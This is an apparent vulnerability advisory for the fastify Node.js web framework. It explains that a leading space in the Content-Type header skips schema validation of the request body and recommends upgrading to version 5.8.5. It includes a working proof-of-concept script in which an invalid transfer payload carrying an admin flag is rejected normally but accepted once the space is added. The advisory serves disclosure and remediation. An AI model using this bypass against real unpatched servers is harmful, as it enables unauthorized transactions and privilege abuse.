Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Upgrade fastify to version 5.8.5 or higher.
fastify is a fast and low-overhead web framework for Node.js.
Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input via the schema.body.content when a space is prepended to the Content-Type header. An attacker can bypass input validation by sending requests with a leading space in the Content-Type header, causing the body to be parsed but skipping schema validation.
Note: Even though the vulnerability was fixed in version 5.3.2, that version introduced a regression, and a new vulnerability was caused by the fix (CVE-2026-33806). To be fully protected from both the original issue and the regression, upgrade to v5.8.5.
// Proof of concept: a route whose body schema is declared per content type
// (schema.body.content). The schema is enforced for 'application/json' but
// skipped when the Content-Type header carries a leading space.
const fastify = require('fastify')({ logger: false });

fastify.post('/transfer', {
  schema: {
    body: {
      content: {
        'application/json': {
          schema: {
            type: 'object',
            required: ['amount', 'recipient'],
            properties: {
              amount: { type: 'number', maximum: 1000 },
              recipient: { type: 'string', maxLength: 50 },
              admin: { type: 'boolean', enum: [false] }
            },
            additionalProperties: false
          }
        }
      }
    }
  }
}, async (request) => {
  return { processed: true, data: request.body };
});

(async () => {
  await fastify.ready();

  // BLOCKED — normal request with invalid payload
  const res1 = await fastify.inject({
    method: 'POST',
    url: '/transfer',
    headers: { 'content-type': 'application/json' },
    payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
  });
  console.log('Normal:', res1.statusCode);
  // → 400 FST_ERR_VALIDATION

  // BYPASS — single leading space
  const res2 = await fastify.inject({
    method: 'POST',
    url: '/transfer',
    headers: { 'content-type': ' application/json' },
    payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
  });
  console.log('Leading space:', res2.statusCode);
  // → 200 (validation bypassed!)
  console.log('Body:', res2.body);

  await fastify.close();
})();